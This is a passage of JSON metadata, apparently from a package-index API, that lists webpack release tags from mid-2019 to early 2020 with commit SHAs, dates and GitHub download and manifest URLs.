bbd","kind":"tag","published_at":"2020-01-29T21:23:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.13/manifests"},{"name":"v5.0.0-beta.12","sha":"228c1caaaff0938be2792cd516e5171cc2ce5e49","kind":"tag","published_at":"2020-01-16T00:09:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.12/manifests"},{"name":"v4.41.5","sha":"45ecebc9f0486c43efc7b56f2c31426d94a55264","kind":"tag","published_at":"2019-12-27T21:09:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.5","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.5/manifests"},{"name":"v5.0.0-beta.11","sha":"3e3b7a2e363dc7746cbde1abbfa188e8aa7f1dea","kind":"tag","published_at":"2019-12-24T07:28:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.11/manifests"},{"name":"v5.0.0-beta.10","sha":"bd21c4d04f15d54f3a8233b742aebdd4b62bb9c2","kind":"tag","published_at":"2019-12-22T00:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.10/manifests"},{"name":"v4.41.4","sha":"dcc45dd977356f08061b2e9451792c6218910891","kind":"tag","published_at":"2019-12-19T07:28:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.4","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.4/manifests"},{"name":"v4.41.3","sha":"df9f3eb7d9e4e60e53bfd1595d857bc7f912bc21","kind":"tag","published_at":"2019-12-16T09:33:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.3/manifests"},{"name":"v5.0.0-beta.9","sha":"3ae73b62326e12546949e1d21db25b93b064e81b","kind":"tag","published_at":"2019-12-08T21:50:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.9/manifests"},{"name":"v5.0.0-beta.8","sha":"9ffda5aee96a6456a2cfe11853d2a0bf5118c7cb","kind":"tag","published_at":"2019-12-08T21:44:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.8/manifests"},{"name":"v5.0.0-beta.7","sha":"697ebe81e13681093e9e643986e5011e0aa3a398","kind":"tag","published_at":"2019-11-20T21:51:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.7/manifests"},{"name":"v5.0.0-beta.6","sha":"de1e11b0b5209440a2992eb4ed7dd2ec30391c8f","kind":"tag","published_at":"2019-11-14T21:54:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.6/manifests"},{"name":"v5.0.0-beta.5","sha":"85145cebf3ed50014b36e76047681bbb066bbe1f","kind":"tag","published_at":"2019-11-13T13:32:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.5/manifests"},{"name":"v5.0.0-beta.4","sha":"f6f5364ad18fcf1b5a33e66d3350d6809ddb03e4","kind":"tag","published_at":"2019-11-12T18:09:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.4/manifests"},{"name":"v5.0.0-beta.3","sha":"43afd3d8ee53eb31a61ac78d4bfe067cd63a7fab","kind":"tag","published_at":"2019-11-06T00:09:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.3/manifests"},{"name":"v5.0.0-beta.2","sha":"b3e42f3d67df70d5d7cadb47efa2078b97a01ab8","kind":"tag","published_at":"2019-10-31T07:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.2/manifests"},{"name":"v5.0.0-beta.1","sha":"4940cb1536967ecfafb4267b2e912ef376481896","kind":"tag","published_at":"2019-10-22T15:56:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.1/manifests"},{"name":"v4.41.2","sha":"11e94dd2d0a8d8baae75e715ff8a69f27a9e3014","kind":"tag","published_at":"2019-10-15T13:01:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.2/manifests"},{"name":"v5.0.0-beta.0","sha":"1bd85218c0e5adc54f381a63e4187e5fe435a81f","kind":"tag","published_at":"2019-10-11T12:58:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-beta.0/manifests"},{"name":"v5.0.0-alpha.32","sha":"8a73bc411b470f5d211053c99efbc1569d630f1b","kind":"tag","published_at":"2019-10-11T12:55:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.32","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.32","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.32","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.32/manifests"},{"name":"v4.41.1","sha":"dcfda0061cef24d68312216893da0b38f4a670f9","kind":"tag","published_at":"2019-10-11T11:42:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.1/manifests"},{"name":"v5.0.0-alpha.31","sha":"2bebf88509441835b71af9904e574ea6303642b7","kind":"tag","published_at":"2019-10-10T20:42:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.31","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.31","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.31","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.31/manifests"},{"name":"v5.0.0-alpha.30","sha":"05a01f3c281fec762c392ae1516ab32cc564859d","kind":"tag","published_at":"2019-10-07T14:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.30","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.30","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.30","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.30/manifests"},{"name":"v5.0.0-alpha.29","sha":"6709efb409383aae3c7821c1eea85de107f777b7","kind":"tag","published_at":"2019-10-02T06:01:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.29","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.29","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.29","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.29/manifests"},{"name":"v5.0.0-alpha.28","sha":"5aeef4793592113fe354a2f7f4a56dcb2c253dbe","kind":"tag","published_at":"2019-09-26T21:04:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.28","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.28/manifests"},{"name":"v5.0.0-alpha.27","sha":"b9ffbbaec3f6f5da2cab010baa928bbc545db918","kind":"tag","published_at":"2019-09-25T22:48:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.27","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.27/manifests"},{"name":"v4.41.0","sha":"36e318b75c62f4f4a95597e75ecf09d92069f3c4","kind":"tag","published_at":"2019-09-24T15:45:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.41.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.41.0/manifests"},{"name":"v4.40.3","sha":"b58560cf5cafdfe47a3ac3424a3d6ee95954759b","kind":"tag","published_at":"2019-09-24T15:39:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.3/manifests"},{"name":"v4.40.2","sha":"d1fffd8bbeb024d1452a7f7a33a4c0c87604d8ec","kind":"tag","published_at":"2019-09-13T14:29:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.2/manifests"},{"name":"v4.40.1","sha":"e4c7d8c0ae0c93306f07920bc28fe72119bc098a","kind":"tag","published_at":"2019-09-13T07:07:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.1/manifests"},{"name":"v4.40.0","sha":"9c6b36787fe43581d6c568e64b71656274c04881","kind":"tag","published_at":"2019-09-12T18:52:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.40.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.40.0/manifests"},{"name":"v5.0.0-alpha.26","sha":"77ef20c1e3e57149053588785f69a69a41f542fc","kind":"tag","published_at":"2019-09-08T20:58:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.26","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.26/manifests"},{"name":"v5.0.0-alpha.25","sha":"332a14596af7a5792b7b041aeb0cd7544a509c37","kind":"tag","published_at":"2019-09-06T13:37:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.25","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.25/manifests"},{"name":"v5.0.0-alpha.24","sha":"7c7c96d18c410f6cd4bf15db26650309661c75ea","kind":"tag","published_at":"2019-09-05T12:13:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.24","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.24/manifests"},{"name":"v5.0.0-alpha.23","sha":"4a88ea6de08677d4538201605408b42bdaa9c8c7","kind":"tag","published_at":"2019-08-27T17:17:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.23","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.23/manifests"},{"name":"v4.39.3","sha":"94929a59a79bc79cab789804d5592c3ec0605cc4","kind":"tag","published_at":"2019-08-27T12:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.3","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.3/manifests"},{"name":"v5.0.0-alpha.22","sha":"4bd900e790611f32431d46ec4af559bc90d267ff","kind":"tag","published_at":"2019-08-23T13:16:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.22","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.22/manifests"},{"name":"v5.0.0-alpha.21","sha":"2a7f242968c2597fb9b955645fe7f4b57b61d62e","kind":"tag","published_at":"2019-08-22T19:01:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.21","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.21/manifests"},{"name":"v5.0.0-alpha.20","sha":"8e1ea8385d10c13c15c79eb9c4146e071ef8d565","kind":"tag","published_at":"2019-08-14T08:21:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.20","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.20/manifests"},{"name":"v4.39.2","sha":"7265427acf9cd4f0f36f05c1ba16a0abedb7bbc1","kind":"tag","published_at":"2019-08-13T17:45:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.2","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.2/manifests"},{"name":"v5.0.0-alpha.19","sha":"1aefa1116b7d54e445e606aa4cffb3a4ec82cd7a","kind":"tag","published_at":"2019-08-06T14:37:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.0.0-alpha.19","html_url":"https://github.com/webpack/webpack/releases/tag/v5.0.0-alpha.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.0.0-alpha.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.0.0-alpha.19/manifests"},{"name":"v4.39.1","sha":"f29445d46624ef4726465e27bbe6e003aa07f8be","kind":"tag","published_at":"2019-08-02T12:35:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.1/manifests"},{"name":"v4.39.0","sha":"5344837ed67479b838ad07ff353919d41f5d2b9f","kind":"tag","published_at":"2019-08-01T15:30:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.39.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.39.0/manifests"},{"name":"v4.38.0","sha":"ae3db13d7db6dbcdc27f2f3095b532c60c9de1c9","kind":"tag","published_at":"2019-07-26T07:26:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.38.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.38.0/manifests"},{"name":"v4.37.0","sha":"04b0d6b4eaa0e18629998e28f795914291c34723","kind":"tag","published_at":"2019-07-23T09:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.37.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.37.0/manifests"},{"name":"v4.36.1","sha":"92caa5de066ded4232a119752bd5dde1497606ef","kind":"tag","published_at":"2019-07-17T13:58:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.36.1","html_url":"https://github.com/webpack/webpack/releases/tag/v4.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.36.1","tag_